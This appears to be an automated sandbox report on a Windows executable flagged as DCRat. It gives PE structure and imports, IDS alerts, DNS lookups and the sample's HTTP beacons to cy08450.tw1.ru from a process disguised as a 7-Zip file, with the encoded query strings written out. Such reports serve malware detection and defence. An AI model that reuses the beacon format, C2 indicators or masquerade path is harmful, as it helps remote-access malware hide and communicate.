IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x35508	0x40	.rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x33000	0x260	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x3bdc4	0x120	.rdata
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x310ea	0x31200	c5bf61bbedb6ad471e9dc6266398e965	False	0.583959526081425	data	6.708075396341128	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0x33000	0xa612	0xa800	7980b588d5b28128a2f3c36cabe2ce98	False	0.45284598214285715	data	5.221742709250668	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0x3e000	0x23728	0x1000	201530c9e56f172adf2473053298d48f	False	0.36767578125	data	3.7088186669877685	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.didat	0x62000	0x188	0x200	c5d41d8f254f69e567595ab94266cfdc	False	0.4453125	data	3.2982538067961342	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0x63000	0x1cf40	0x1d000	98e97386f8fead4dac463d3465aa0101	False	0.33116412984913796	data	4.730799667348088	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x80000	0x2268	0x2400	c7a942b723cb29d9c02f7c611b544b50	False	0.7681206597222222	data	6.5548620101740545	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
PNG	0x635e4	0xb45	PNG image data, 93 x 302, 8-bit/color RGB, non-interlaced	English	United States	1.0027729636048528
PNG	0x6412c	0x15a9	PNG image data, 186 x 604, 8-bit/color RGB, non-interlaced	English	United States	0.9363390441839495
RT_ICON	0x656d8	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 9216, resolution 2834 x 2834 px/m			0.41286307053941906
RT_ICON	0x67c80	0x4228	Device independent bitmap graphic, 64 x 128 x 32, image size 16384, resolution 2834 x 2834 px/m			0.34559518186112426
RT_ICON	0x6bea8	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 1024, resolution 2834 x 2834 px/m			0.7898936170212766
RT_ICON	0x6c310	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 4096, resolution 2834 x 2834 px/m			0.4800656660412758
RT_ICON	0x6d3b8	0x10828	Device independent bitmap graphic, 128 x 256 x 32, image size 65536, resolution 2834 x 2834 px/m			0.21581095469064238
RT_DIALOG	0x7dbe0	0x286	data	English	United States	0.5092879256965944
RT_DIALOG	0x7de68	0x13a	data	English	United States	0.60828025477707
RT_DIALOG	0x7dfa4	0xec	data	English	United States	0.6991525423728814
RT_DIALOG	0x7e090	0x12e	data	English	United States	0.5927152317880795
RT_DIALOG	0x7e1c0	0x338	data	English	United States	0.45145631067961167
RT_DIALOG	0x7e4f8	0x252	data	English	United States	0.5757575757575758
RT_STRING	0x7e74c	0x1e2	data	English	United States	0.3900414937759336
RT_STRING	0x7e930	0x1cc	data	English	United States	0.4282608695652174
RT_STRING	0x7eafc	0x1b8	data	English	United States	0.45681818181818185
RT_STRING	0x7ecb4	0x146	data	English	United States	0.5153374233128835
RT_STRING	0x7edfc	0x446	data	English	United States	0.340036563071298
RT_STRING	0x7f244	0x166	data	English	United States	0.49162011173184356
RT_STRING	0x7f3ac	0x152	data	English	United States	0.5059171597633136
RT_STRING	0x7f500	0x10a	data	English	United States	0.49624060150375937
RT_STRING	0x7f60c	0xbc	data	English	United States	0.6329787234042553
RT_STRING	0x7f6c8	0xd6	data	English	United States	0.5747663551401869
RT_GROUP_ICON	0x7f7a0	0x4c	data			0.7763157894736842
RT_MANIFEST	0x7f7ec	0x753	XML 1.0 document, ASCII text, with CRLF line terminators	English	United States	0.3957333333333333

Imports

DLL

Import

KERNEL32.dll

GetLastError, SetLastError, FormatMessageW, GetCurrentProcess, DeviceIoControl, SetFileTime, CloseHandle, CreateDirectoryW, RemoveDirectoryW, CreateFileW, DeleteFileW, CreateHardLinkW, GetShortPathNameW, GetLongPathNameW, MoveFileW, GetFileType, GetStdHandle, WriteFile, ReadFile, FlushFileBuffers, SetEndOfFile, SetFilePointer, SetFileAttributesW, GetFileAttributesW, FindClose, FindFirstFileW, FindNextFileW, GetVersionExW, GetCurrentDirectoryW, GetFullPathNameW, FoldStringW, GetModuleFileNameW, GetModuleHandleW, FindResourceW, FreeLibrary, GetProcAddress, GetCurrentProcessId, ExitProcess, SetThreadExecutionState, Sleep, LoadLibraryW, GetSystemDirectoryW, CompareStringW, AllocConsole, FreeConsole, AttachConsole, WriteConsoleW, GetProcessAffinityMask, CreateThread, SetThreadPriority, InitializeCriticalSection, EnterCriticalSection, LeaveCriticalSection, DeleteCriticalSection, SetEvent, ResetEvent, ReleaseSemaphore, WaitForSingleObject, CreateEventW, CreateSemaphoreW, GetSystemTime, SystemTimeToTzSpecificLocalTime, TzSpecificLocalTimeToSystemTime, SystemTimeToFileTime, FileTimeToLocalFileTime, LocalFileTimeToFileTime, FileTimeToSystemTime, GetCPInfo, IsDBCSLeadByte, MultiByteToWideChar, WideCharToMultiByte, GlobalAlloc, LockResource, GlobalLock, GlobalUnlock, GlobalFree, LoadResource, SizeofResource, SetCurrentDirectoryW, GetExitCodeProcess, GetLocalTime, GetTickCount, MapViewOfFile, UnmapViewOfFile, CreateFileMappingW, OpenFileMappingW, GetCommandLineW, SetEnvironmentVariableW, ExpandEnvironmentStringsW, GetTempPathW, MoveFileExW, GetLocaleInfoW, GetTimeFormatW, GetDateFormatW, GetNumberFormatW, SetFilePointerEx, GetConsoleMode, GetConsoleCP, HeapSize, SetStdHandle, GetProcessHeap, RaiseException, GetSystemInfo, VirtualProtect, VirtualQuery, LoadLibraryExA, IsProcessorFeaturePresent, IsDebuggerPresent, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetStartupInfoW, QueryPerformanceCounter, GetCurrentThreadId, GetSystemTimeAsFileTime, InitializeSListHead, TerminateProcess, RtlUnwind, EncodePointer, InitializeCriticalSectionAndSpinCount, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, LoadLibraryExW, QueryPerformanceFrequency, GetModuleHandleExW, GetModuleFileNameA, GetACP, HeapFree, HeapAlloc, HeapReAlloc, GetStringTypeW, LCMapStringW, FindFirstFileExA, FindNextFileA, IsValidCodePage, GetOEMCP, GetCommandLineA, GetEnvironmentStringsW, FreeEnvironmentStringsW, DecodePointer

gdiplus.dll

GdiplusShutdown, GdiplusStartup, GdipCreateHBITMAPFromBitmap, GdipCreateBitmapFromStreamICM, GdipCreateBitmapFromStream, GdipDisposeImage, GdipCloneImage, GdipFree, GdipAlloc

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2024-10-30T18:27:10.989232+0100	2034194	ET MALWARE DCRAT Activity (GET)	1	192.168.2.5	49704	185.114.245.123	80	TCP
2024-10-30T18:27:13.801986+0100	2034194	ET MALWARE DCRAT Activity (GET)	1	192.168.2.5	49710	185.114.245.123	80	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Oct 30, 2024 18:27:10.064958096 CET	49704	80	192.168.2.5	185.114.245.123
Oct 30, 2024 18:27:10.070306063 CET	80	49704	185.114.245.123	192.168.2.5
Oct 30, 2024 18:27:10.070421934 CET	49704	80	192.168.2.5	185.114.245.123
Oct 30, 2024 18:27:10.074256897 CET	49704	80	192.168.2.5	185.114.245.123
Oct 30, 2024 18:27:10.079557896 CET	80	49704	185.114.245.123	192.168.2.5
Oct 30, 2024 18:27:10.945635080 CET	80	49704	185.114.245.123	192.168.2.5
Oct 30, 2024 18:27:10.989232063 CET	49704	80	192.168.2.5	185.114.245.123
Oct 30, 2024 18:27:11.009706020 CET	49705	443	192.168.2.5	185.114.245.123
Oct 30, 2024 18:27:11.009742022 CET	443	49705	185.114.245.123	192.168.2.5
Oct 30, 2024 18:27:11.009850025 CET	49705	443	192.168.2.5	185.114.245.123
Oct 30, 2024 18:27:11.027764082 CET	49705	443	192.168.2.5	185.114.245.123
Oct 30, 2024 18:27:11.027784109 CET	443	49705	185.114.245.123	192.168.2.5
Oct 30, 2024 18:27:11.935359001 CET	443	49705	185.114.245.123	192.168.2.5
Oct 30, 2024 18:27:11.935460091 CET	49705	443	192.168.2.5	185.114.245.123
Oct 30, 2024 18:27:11.938750982 CET	49705	443	192.168.2.5	185.114.245.123
Oct 30, 2024 18:27:11.938757896 CET	443	49705	185.114.245.123	192.168.2.5
Oct 30, 2024 18:27:11.938967943 CET	443	49705	185.114.245.123	192.168.2.5
Oct 30, 2024 18:27:11.989253998 CET	49705	443	192.168.2.5	185.114.245.123
Oct 30, 2024 18:27:12.025194883 CET	49705	443	192.168.2.5	185.114.245.123
Oct 30, 2024 18:27:12.071325064 CET	443	49705	185.114.245.123	192.168.2.5
Oct 30, 2024 18:27:12.419918060 CET	443	49705	185.114.245.123	192.168.2.5
Oct 30, 2024 18:27:12.419943094 CET	443	49705	185.114.245.123	192.168.2.5
Oct 30, 2024 18:27:12.419950962 CET	443	49705	185.114.245.123	192.168.2.5
Oct 30, 2024 18:27:12.419972897 CET	443	49705	185.114.245.123	192.168.2.5
Oct 30, 2024 18:27:12.420003891 CET	443	49705	185.114.245.123	192.168.2.5
Oct 30, 2024 18:27:12.420012951 CET	49705	443	192.168.2.5	185.114.245.123
Oct 30, 2024 18:27:12.420027971 CET	443	49705	185.114.245.123	192.168.2.5
Oct 30, 2024 18:27:12.420042038 CET	49705	443	192.168.2.5	185.114.245.123
Oct 30, 2024 18:27:12.420068979 CET	49705	443	192.168.2.5	185.114.245.123
Oct 30, 2024 18:27:12.572143078 CET	443	49705	185.114.245.123	192.168.2.5
Oct 30, 2024 18:27:12.572164059 CET	443	49705	185.114.245.123	192.168.2.5
Oct 30, 2024 18:27:12.572242022 CET	49705	443	192.168.2.5	185.114.245.123
Oct 30, 2024 18:27:12.572252989 CET	443	49705	185.114.245.123	192.168.2.5
Oct 30, 2024 18:27:12.572308064 CET	49705	443	192.168.2.5	185.114.245.123
Oct 30, 2024 18:27:12.687516928 CET	443	49705	185.114.245.123	192.168.2.5
Oct 30, 2024 18:27:12.687540054 CET	443	49705	185.114.245.123	192.168.2.5
Oct 30, 2024 18:27:12.687637091 CET	49705	443	192.168.2.5	185.114.245.123
Oct 30, 2024 18:27:12.687647104 CET	443	49705	185.114.245.123	192.168.2.5
Oct 30, 2024 18:27:12.687696934 CET	49705	443	192.168.2.5	185.114.245.123
Oct 30, 2024 18:27:12.803438902 CET	443	49705	185.114.245.123	192.168.2.5
Oct 30, 2024 18:27:12.803455114 CET	443	49705	185.114.245.123	192.168.2.5
Oct 30, 2024 18:27:12.803514004 CET	49705	443	192.168.2.5	185.114.245.123
Oct 30, 2024 18:27:12.803520918 CET	443	49705	185.114.245.123	192.168.2.5
Oct 30, 2024 18:27:12.803572893 CET	49705	443	192.168.2.5	185.114.245.123
Oct 30, 2024 18:27:12.827085972 CET	443	49705	185.114.245.123	192.168.2.5
Oct 30, 2024 18:27:12.827122927 CET	443	49705	185.114.245.123	192.168.2.5
Oct 30, 2024 18:27:12.827151060 CET	49705	443	192.168.2.5	185.114.245.123
Oct 30, 2024 18:27:12.827151060 CET	443	49705	185.114.245.123	192.168.2.5
Oct 30, 2024 18:27:12.827203989 CET	49705	443	192.168.2.5	185.114.245.123
Oct 30, 2024 18:27:12.830760002 CET	49705	443	192.168.2.5	185.114.245.123
Oct 30, 2024 18:27:12.834949970 CET	49704	80	192.168.2.5	185.114.245.123
Oct 30, 2024 18:27:12.835763931 CET	49710	80	192.168.2.5	185.114.245.123
Oct 30, 2024 18:27:12.841197968 CET	80	49704	185.114.245.123	192.168.2.5
Oct 30, 2024 18:27:12.841214895 CET	80	49710	185.114.245.123	192.168.2.5
Oct 30, 2024 18:27:12.841253042 CET	49704	80	192.168.2.5	185.114.245.123
Oct 30, 2024 18:27:12.841304064 CET	49710	80	192.168.2.5	185.114.245.123
Oct 30, 2024 18:27:12.841408968 CET	49710	80	192.168.2.5	185.114.245.123
Oct 30, 2024 18:27:12.847038031 CET	80	49710	185.114.245.123	192.168.2.5
Oct 30, 2024 18:27:13.752525091 CET	80	49710	185.114.245.123	192.168.2.5
Oct 30, 2024 18:27:13.774071932 CET	49713	443	192.168.2.5	185.114.245.123
Oct 30, 2024 18:27:13.774139881 CET	443	49713	185.114.245.123	192.168.2.5
Oct 30, 2024 18:27:13.774208069 CET	49713	443	192.168.2.5	185.114.245.123
Oct 30, 2024 18:27:13.774504900 CET	49713	443	192.168.2.5	185.114.245.123
Oct 30, 2024 18:27:13.774522066 CET	443	49713	185.114.245.123	192.168.2.5
Oct 30, 2024 18:27:13.801985979 CET	49710	80	192.168.2.5	185.114.245.123
Oct 30, 2024 18:27:14.055666924 CET	80	49710	185.114.245.123	192.168.2.5
Oct 30, 2024 18:27:14.055733919 CET	49710	80	192.168.2.5	185.114.245.123
Oct 30, 2024 18:27:14.668837070 CET	443	49713	185.114.245.123	192.168.2.5
Oct 30, 2024 18:27:14.719417095 CET	49713	443	192.168.2.5	185.114.245.123
Oct 30, 2024 18:27:14.719446898 CET	443	49713	185.114.245.123	192.168.2.5
Oct 30, 2024 18:27:15.109775066 CET	443	49713	185.114.245.123	192.168.2.5
Oct 30, 2024 18:27:15.109797001 CET	443	49713	185.114.245.123	192.168.2.5
Oct 30, 2024 18:27:15.109803915 CET	443	49713	185.114.245.123	192.168.2.5
Oct 30, 2024 18:27:15.109813929 CET	443	49713	185.114.245.123	192.168.2.5
Oct 30, 2024 18:27:15.109860897 CET	443	49713	185.114.245.123	192.168.2.5
Oct 30, 2024 18:27:15.109874010 CET	49713	443	192.168.2.5	185.114.245.123
Oct 30, 2024 18:27:15.109900951 CET	443	49713	185.114.245.123	192.168.2.5
Oct 30, 2024 18:27:15.109915018 CET	49713	443	192.168.2.5	185.114.245.123
Oct 30, 2024 18:27:15.109951019 CET	49713	443	192.168.2.5	185.114.245.123
Oct 30, 2024 18:27:15.253797054 CET	443	49713	185.114.245.123	192.168.2.5
Oct 30, 2024 18:27:15.253814936 CET	443	49713	185.114.245.123	192.168.2.5
Oct 30, 2024 18:27:15.253963947 CET	49713	443	192.168.2.5	185.114.245.123
Oct 30, 2024 18:27:15.253978968 CET	443	49713	185.114.245.123	192.168.2.5
Oct 30, 2024 18:27:15.254062891 CET	49713	443	192.168.2.5	185.114.245.123
Oct 30, 2024 18:27:15.376821041 CET	443	49713	185.114.245.123	192.168.2.5
Oct 30, 2024 18:27:15.376837969 CET	443	49713	185.114.245.123	192.168.2.5
Oct 30, 2024 18:27:15.377007961 CET	49713	443	192.168.2.5	185.114.245.123
Oct 30, 2024 18:27:15.377023935 CET	443	49713	185.114.245.123	192.168.2.5
Oct 30, 2024 18:27:15.377073050 CET	49713	443	192.168.2.5	185.114.245.123
Oct 30, 2024 18:27:15.494503975 CET	443	49713	185.114.245.123	192.168.2.5
Oct 30, 2024 18:27:15.494520903 CET	443	49713	185.114.245.123	192.168.2.5
Oct 30, 2024 18:27:15.494611025 CET	49713	443	192.168.2.5	185.114.245.123
Oct 30, 2024 18:27:15.494622946 CET	443	49713	185.114.245.123	192.168.2.5
Oct 30, 2024 18:27:15.494990110 CET	49713	443	192.168.2.5	185.114.245.123
Oct 30, 2024 18:27:15.565650940 CET	443	49713	185.114.245.123	192.168.2.5
Oct 30, 2024 18:27:15.565712929 CET	443	49713	185.114.245.123	192.168.2.5
Oct 30, 2024 18:27:15.565740108 CET	49713	443	192.168.2.5	185.114.245.123
Oct 30, 2024 18:27:15.565779924 CET	49713	443	192.168.2.5	185.114.245.123
Oct 30, 2024 18:27:15.569164038 CET	49713	443	192.168.2.5	185.114.245.123
Oct 30, 2024 18:27:15.574284077 CET	49710	80	192.168.2.5	185.114.245.123

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Oct 30, 2024 18:27:10.002387047 CET	65070	53	192.168.2.5	1.1.1.1
Oct 30, 2024 18:27:10.059303045 CET	53	65070	1.1.1.1	192.168.2.5
Oct 30, 2024 18:27:10.953237057 CET	49188	53	192.168.2.5	1.1.1.1
Oct 30, 2024 18:27:11.008908033 CET	53	49188	1.1.1.1	192.168.2.5
Oct 30, 2024 18:27:28.749702930 CET	53	51343	162.159.36.2	192.168.2.5
Oct 30, 2024 18:27:29.366095066 CET	63832	53	192.168.2.5	1.1.1.1
Oct 30, 2024 18:27:29.376111984 CET	53	63832	1.1.1.1	192.168.2.5
Oct 30, 2024 18:27:31.270390987 CET	58430	53	192.168.2.5	1.1.1.1
Oct 30, 2024 18:27:31.279656887 CET	53	58430	1.1.1.1	192.168.2.5

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Oct 30, 2024 18:27:10.002387047 CET	192.168.2.5	1.1.1.1	0x24ae	Standard query (0)	cy08450.tw1.ru	A (IP address)	IN (0x0001)	false
Oct 30, 2024 18:27:10.953237057 CET	192.168.2.5	1.1.1.1	0x1375	Standard query (0)	vh438.timeweb.ru	A (IP address)	IN (0x0001)	false
Oct 30, 2024 18:27:29.366095066 CET	192.168.2.5	1.1.1.1	0x2901	Standard query (0)	241.42.69.40.in-addr.arpa	PTR (Pointer record)	IN (0x0001)	false
Oct 30, 2024 18:27:31.270390987 CET	192.168.2.5	1.1.1.1	0x396c	Standard query (0)	53.210.109.20.in-addr.arpa	PTR (Pointer record)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Oct 30, 2024 18:27:10.059303045 CET	1.1.1.1	192.168.2.5	0x24ae	No error (0)	cy08450.tw1.ru		185.114.245.123	A (IP address)	IN (0x0001)	false
Oct 30, 2024 18:27:11.008908033 CET	1.1.1.1	192.168.2.5	0x1375	No error (0)	vh438.timeweb.ru		185.114.245.123	A (IP address)	IN (0x0001)	false
Oct 30, 2024 18:27:29.376111984 CET	1.1.1.1	192.168.2.5	0x2901	Name error (3)	241.42.69.40.in-addr.arpa	none	none	PTR (Pointer record)	IN (0x0001)	false
Oct 30, 2024 18:27:31.279656887 CET	1.1.1.1	192.168.2.5	0x396c	Name error (3)	53.210.109.20.in-addr.arpa	none	none	PTR (Pointer record)	IN (0x0001)	false

HTTP Request Dependency Graph

vh438.timeweb.ru

cy08450.tw1.ru

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.5	49704	185.114.245.123	80	5968	C:\Program Files\7-Zip\Lang\Memory Compression.exe

Timestamp	Bytes transferred	Direction	Data
Oct 30, 2024 18:27:10.074256897 CET	597	OUT	GET /98c5dfaf.php?6KrZzmJwk86p7OrsOlV5no6Kl=5pmNLP5bbforFzU&FsHKNcwZ0eU4ISOgyXreJWxqtgwMEh=glqiOCaOd2NXq5ASJ&H3rHzwt5aa=pkVT8xTbt9eXJOl69GvsNn&3e48e0b3851c0a441c70744047c3bbd6=2dfc2c4d65174f7765d320b12c48ed88&a552bb1baa0205e417bc3d750c585e5e=QZ3EzN1QWYlVDOzMTYxUTNkNzMjRzYxYjNzYTM5cTNiZWNxEWOmVmY&6KrZzmJwk86p7OrsOlV5no6Kl=5pmNLP5bbforFzU&FsHKNcwZ0eU4ISOgyXreJWxqtgwMEh=glqiOCaOd2NXq5ASJ&H3rHzwt5aa=pkVT8xTbt9eXJOl69GvsNn HTTP/1.1 Accept: / Content-Type: text/csv User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0 Host: cy08450.tw1.ru Connection: Keep-Alive
Oct 30, 2024 18:27:10.945635080 CET	800	IN	HTTP/1.1 301 Moved Permanently Server: nginx/1.26.1 Date: Wed, 30 Oct 2024 17:27:10 GMT Content-Type: text/html Content-Length: 169 Connection: keep-alive Location: https://vh438.timeweb.ru/parking/?ref=cy08450.tw1.ru&6KrZzmJwk86p7OrsOlV5no6Kl=5pmNLP5bbforFzU&FsHKNcwZ0eU4ISOgyXreJWxqtgwMEh=glqiOCaOd2NXq5ASJ&H3rHzwt5aa=pkVT8xTbt9eXJOl69GvsNn&3e48e0b3851c0a441c70744047c3bbd6=2dfc2c4d65174f7765d320b12c48ed88&a552bb1baa0205e417bc3d750c585e5e=QZ3EzN1QWYlVDOzMTYxUTNkNzMjRzYxYjNzYTM5cTNiZWNxEWOmVmY&6KrZzmJwk86p7OrsOlV5no6Kl=5pmNLP5bbforFzU&FsHKNcwZ0eU4ISOgyXreJWxqtgwMEh=glqiOCaOd2NXq5ASJ&H3rHzwt5aa=pkVT8xTbt9eXJOl69GvsNn Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 36 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx/1.26.1</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.5	49710	185.114.245.123	80	5968	C:\Program Files\7-Zip\Lang\Memory Compression.exe

Timestamp	Bytes transferred	Direction	Data
Oct 30, 2024 18:27:12.841408968 CET	597	OUT	GET /98c5dfaf.php?6KrZzmJwk86p7OrsOlV5no6Kl=5pmNLP5bbforFzU&FsHKNcwZ0eU4ISOgyXreJWxqtgwMEh=glqiOCaOd2NXq5ASJ&H3rHzwt5aa=pkVT8xTbt9eXJOl69GvsNn&3e48e0b3851c0a441c70744047c3bbd6=2dfc2c4d65174f7765d320b12c48ed88&a552bb1baa0205e417bc3d750c585e5e=QZ3EzN1QWYlVDOzMTYxUTNkNzMjRzYxYjNzYTM5cTNiZWNxEWOmVmY&6KrZzmJwk86p7OrsOlV5no6Kl=5pmNLP5bbforFzU&FsHKNcwZ0eU4ISOgyXreJWxqtgwMEh=glqiOCaOd2NXq5ASJ&H3rHzwt5aa=pkVT8xTbt9eXJOl69GvsNn HTTP/1.1 Accept: / Content-Type: text/csv User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0 Host: cy08450.tw1.ru Connection: Keep-Alive
Oct 30, 2024 18:27:13.752525091 CET	800	IN	HTTP/1.1 301 Moved Permanently Server: nginx/1.26.1 Date: Wed, 30 Oct 2024 17:27:13 GMT Content-Type: text/html Content-Length: 169 Connection: keep-alive Location: https://vh438.timeweb.ru/parking/?ref=cy08450.tw1.ru&6KrZzmJwk86p7OrsOlV5no6Kl=5pmNLP5bbforFzU&FsHKNcwZ0eU4ISOgyXreJWxqtgwMEh=glqiOCaOd2NXq5ASJ&H3rHzwt5aa=pkVT8xTbt9eXJOl69GvsNn&3e48e0b3851c0a441c70744047c3bbd6=2dfc2c4d65174f7765d320b12c48ed88&a552bb1baa0205e417bc3d750c585e5e=QZ3EzN1QWYlVDOzMTYxUTNkNzMjRzYxYjNzYTM5cTNiZWNxEWOmVmY&6KrZzmJwk86p7OrsOlV5no6Kl=5pmNLP5bbforFzU&FsHKNcwZ0eU4ISOgyXreJWxqtgwMEh=glqiOCaOd2NXq5ASJ&H3rHzwt5aa=pkVT8xTbt9eXJOl69GvsNn Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 36 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx/1.26.1</center></body></html>
Oct 30, 2024 18:27:14.055666924 CET	800	IN	HTTP/1.1 301 Moved Permanently Server: nginx/1.26.1 Date: Wed, 30 Oct 2024 17:27:13 GMT Content-Type: text/html Content-Length: 169 Connection: keep-alive Location: https://vh438.timeweb.ru/parking/?ref=cy08450.tw1.ru&6KrZzmJwk86p7OrsOlV5no6Kl=5pmNLP5bbforFzU&FsHKNcwZ0eU4ISOgyXreJWxqtgwMEh=glqiOCaOd2NXq5ASJ&H3rHzwt5aa=pkVT8xTbt9eXJOl69GvsNn&3e48e0b3851c0a441c70744047c3bbd6=2dfc2c4d65174f7765d320b12c48ed88&a552bb1baa0205e417bc3d750c585e5e=QZ3EzN1QWYlVDOzMTYxUTNkNzMjRzYxYjNzYTM5cTNiZWNxEWOmVmY&6KrZzmJwk86p7OrsOlV5no6Kl=5pmNLP5bbforFzU&FsHKNcwZ0eU4ISOgyXreJWxqtgwMEh=glqiOCaOd2NXq5ASJ&H3rHzwt5aa=pkVT8xTbt9eXJOl69GvsNn Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 36 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx/1.26.1</center></body></html>

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.5	49705	185.114.245.123	443	5968	C:\Program Files\7-Zip\Lang\Memory Compression.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-30 17:27:12 UTC	614	OUT	GET /parking/?ref=cy08450.tw1.ru&6KrZzmJwk86p7OrsOlV5no6Kl=5pmNLP5bbforFzU&FsHKNcwZ0eU4ISOgyXreJWxqtgwMEh=glqiOCaOd2NXq5ASJ&H3rHzwt5aa=pkVT8xTbt9eXJOl69GvsNn&3e48e0b3851c0a441c70744047c3bbd6=2dfc2c4d65174f7765d320b12c48ed88&a552bb1baa0205e417bc3d750c585e5e=QZ3EzN1QWYlVDOzMTYxUTNkNzMjRzYxYjNzYTM5cTNiZWNxEWOmVmY&6KrZzmJwk86p7OrsOlV5no6Kl=5pmNLP5bbforFzU&FsHKNcwZ0eU4ISOgyXreJWxqtgwMEh=glqiOCaOd2NXq5ASJ&H3rHzwt5aa=pkVT8xTbt9eXJOl69GvsNn HTTP/1.1 Accept: / Content-Type: text/csv User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0 Host: vh438.timeweb.ru Connection: Keep-Alive
2024-10-30 17:27:12 UTC	280	IN	HTTP/1.1 200 OK Server: nginx/1.26.1 Date: Wed, 30 Oct 2024 17:27:12 GMT Content-Type: text/html; charset=utf-8 Content-Length: 77133 Connection: close Vary: Accept-Encoding Last-Modified: Wed, 16 Apr 2014 07:06:24 GMT ETag: "12d4d-4f7238deedc00" Accept-Ranges: bytes
